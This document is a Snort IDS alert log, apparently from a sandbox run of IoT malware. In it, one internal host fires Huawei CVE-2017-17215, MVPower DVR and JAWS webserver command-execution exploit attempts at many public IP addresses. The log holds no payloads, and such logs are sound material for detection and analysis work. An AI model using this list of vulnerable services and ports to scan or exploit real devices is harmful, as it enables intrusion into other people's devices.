              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:40630 -> 156.235.97.230:37215
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45826 -> 20.47.19.114:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45120 -> 109.168.109.229:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34232 -> 38.181.35.219:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57840 -> 104.91.11.151:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34232 -> 38.181.35.219:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43892 -> 207.60.214.53:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57840 -> 104.91.11.151:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59784 -> 23.43.229.228:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59634 -> 154.216.168.76:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43892 -> 207.60.214.53:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60350 -> 54.254.143.77:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59784 -> 23.43.229.228:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59634 -> 154.216.168.76:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60350 -> 54.254.143.77:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:54766 -> 35.244.163.221:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36348 -> 23.78.13.160:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:43424 -> 44.237.111.253:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36348 -> 23.78.13.160:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:43424 -> 44.237.111.253:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44962 -> 87.249.21.231:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48474 -> 77.75.231.124:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58160 -> 202.88.191.104:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44962 -> 87.249.21.231:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48474 -> 77.75.231.124:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58160 -> 202.88.191.104:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58232 -> 13.52.177.100:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33472 -> 104.25.41.249:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38590 -> 104.23.98.204:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50906 -> 197.15.56.180:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48156 -> 104.107.146.117:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58232 -> 13.52.177.100:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58458 -> 104.73.17.27:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33472 -> 104.25.41.249:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38590 -> 104.23.98.204:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34372 -> 38.181.35.219:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56504 -> 45.148.36.42:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58458 -> 104.73.17.27:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57970 -> 109.109.200.175:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55542 -> 184.85.129.251:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42578 -> 85.215.117.24:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50906 -> 197.15.56.180:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38402 -> 143.0.84.210:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48156 -> 104.107.146.117:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58726 -> 8.217.69.180:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56504 -> 45.148.36.42:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34372 -> 38.181.35.219:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57970 -> 109.109.200.175:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55542 -> 184.85.129.251:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42578 -> 85.215.117.24:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38402 -> 143.0.84.210:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58726 -> 8.217.69.180:80
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:38108 -> 156.235.102.171:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:38108 -> 156.235.102.171:37215
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50062 -> 23.37.135.65:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40614 -> 5.212.32.2:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57618 -> 162.159.129.103:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50076 -> 181.206.2.46:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41178 -> 52.50.137.229:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57618 -> 162.159.129.103:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50062 -> 23.37.135.65:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49628 -> 38.239.158.196:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50076 -> 181.206.2.46:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59250 -> 175.29.154.101:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41178 -> 52.50.137.229:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44564 -> 171.244.56.107:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49628 -> 38.239.158.196:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59250 -> 175.29.154.101:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44564 -> 171.244.56.107:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:45208 -> 134.0.11.203:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35360 -> 13.239.48.115:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51938 -> 34.107.170.116:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50990 -> 43.139.38.175:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47644 -> 154.223.106.91:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41426 -> 34.203.180.13:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:45208 -> 134.0.11.203:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51938 -> 34.107.170.116:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:39410 -> 213.136.91.17:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47644 -> 154.223.106.91:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41426 -> 34.203.180.13:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35360 -> 13.239.48.115:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50990 -> 43.139.38.175:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:39410 -> 213.136.91.17:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47036 -> 207.91.250.53:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48926 -> 72.37.218.199:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41640 -> 104.79.255.29:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40310 -> 45.15.66.20:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57854 -> 202.81.229.169:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47036 -> 207.91.250.53:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41608 -> 203.170.84.98:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60798 -> 154.214.96.70:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48486 -> 146.71.40.215:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48926 -> 72.37.218.199:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41640 -> 104.79.255.29:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48486 -> 146.71.40.215:80
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:41028 -> 41.0.84.34:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:41028 -> 41.0.84.34:37215
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:42372 -> 104.83.91.41:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40310 -> 45.15.66.20:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:57854 -> 202.81.229.169:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41608 -> 203.170.84.98:80
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:58998 -> 156.77.130.177:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:58998 -> 156.77.130.177:37215
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:42372 -> 104.83.91.41:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44286 -> 170.130.22.254:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36228 -> 98.123.179.98:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:53794 -> 50.199.186.25:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:44286 -> 170.130.22.254:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51342 -> 84.247.28.155:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48182 -> 87.255.233.53:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46650 -> 206.238.103.105:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59390 -> 47.90.200.134:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:53794 -> 50.199.186.25:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36228 -> 98.123.179.98:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48916 -> 23.214.139.17:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50494 -> 104.82.158.98:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59390 -> 47.90.200.134:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47048 -> 89.31.76.45:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51342 -> 84.247.28.155:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48182 -> 87.255.233.53:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58250 -> 152.67.216.180:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46650 -> 206.238.103.105:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52608 -> 206.233.253.224:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48916 -> 23.214.139.17:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59592 -> 158.94.0.206:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50494 -> 104.82.158.98:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36038 -> 23.12.99.171:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47048 -> 89.31.76.45:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:34712 -> 38.181.35.219:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56714 -> 13.244.84.146:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:59818 -> 202.75.28.175:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58250 -> 152.67.216.180:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59592 -> 158.94.0.206:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36038 -> 23.12.99.171:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52608 -> 206.233.253.224:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:34712 -> 38.181.35.219:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56714 -> 13.244.84.146:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:59818 -> 202.75.28.175:80
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:51010 -> 156.247.27.15:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:51010 -> 156.247.27.15:37215
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40870 -> 96.67.179.1:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33052 -> 31.30.58.133:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56368 -> 185.179.157.102:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:36382 -> 154.46.166.188:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:44342 -> 169.53.132.234:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40870 -> 96.67.179.1:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37678 -> 2.135.71.176:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60000 -> 195.62.126.54:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33052 -> 31.30.58.133:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56368 -> 185.179.157.102:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49306 -> 200.159.177.31:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:36382 -> 154.46.166.188:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60000 -> 195.62.126.54:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37678 -> 2.135.71.176:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49306 -> 200.159.177.31:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:58096 -> 62.254.208.10:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:60130 -> 150.60.155.80:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47120 -> 188.128.206.168:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46624 -> 104.105.18.182:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33136 -> 154.92.226.199:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56586 -> 191.96.205.194:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56392 -> 23.204.125.106:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40936 -> 38.132.215.44:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56586 -> 191.96.205.194:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47120 -> 188.128.206.168:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33176 -> 99.16.143.128:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40936 -> 38.132.215.44:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33136 -> 154.92.226.199:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33176 -> 99.16.143.128:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:50616 -> 104.111.199.195:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:37612 -> 23.208.169.8:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:55714 -> 45.66.79.133:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56392 -> 23.204.125.106:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:55714 -> 45.66.79.133:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:50616 -> 104.111.199.195:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:37612 -> 23.208.169.8:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:56446 -> 23.204.125.106:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:41682 -> 157.245.212.163:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:38990 -> 173.246.114.17:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:51466 -> 34.225.232.165:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:41682 -> 157.245.212.163:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:47170 -> 103.39.16.68:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:49346 -> 13.55.87.229:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:56446 -> 23.204.125.106:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:38990 -> 173.246.114.17:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:51466 -> 34.225.232.165:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:58096 -> 62.254.208.10:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:60130 -> 150.60.155.80:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:47170 -> 103.39.16.68:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:49346 -> 13.55.87.229:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:46624 -> 104.105.18.182:80
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:39512 -> 156.235.98.9:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:39512 -> 156.235.98.9:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.23:48376 -> 156.253.36.6:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.23:48376 -> 156.253.36.6:37215
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:33044 -> 20.94.161.145:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48452 -> 173.255.250.61:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:40002 -> 52.222.57.83:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:35188 -> 62.202.156.241:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:33044 -> 20.94.161.145:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:52908 -> 91.194.11.191:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:48452 -> 173.255.250.61:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:40002 -> 52.222.57.83:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:35188 -> 62.202.156.241:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:46628 -> 172.245.174.80:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.23:52908 -> 91.194.11.191:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:57882 -> 50.19.25.188:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.23:48736 -> 193.233.164.237:80
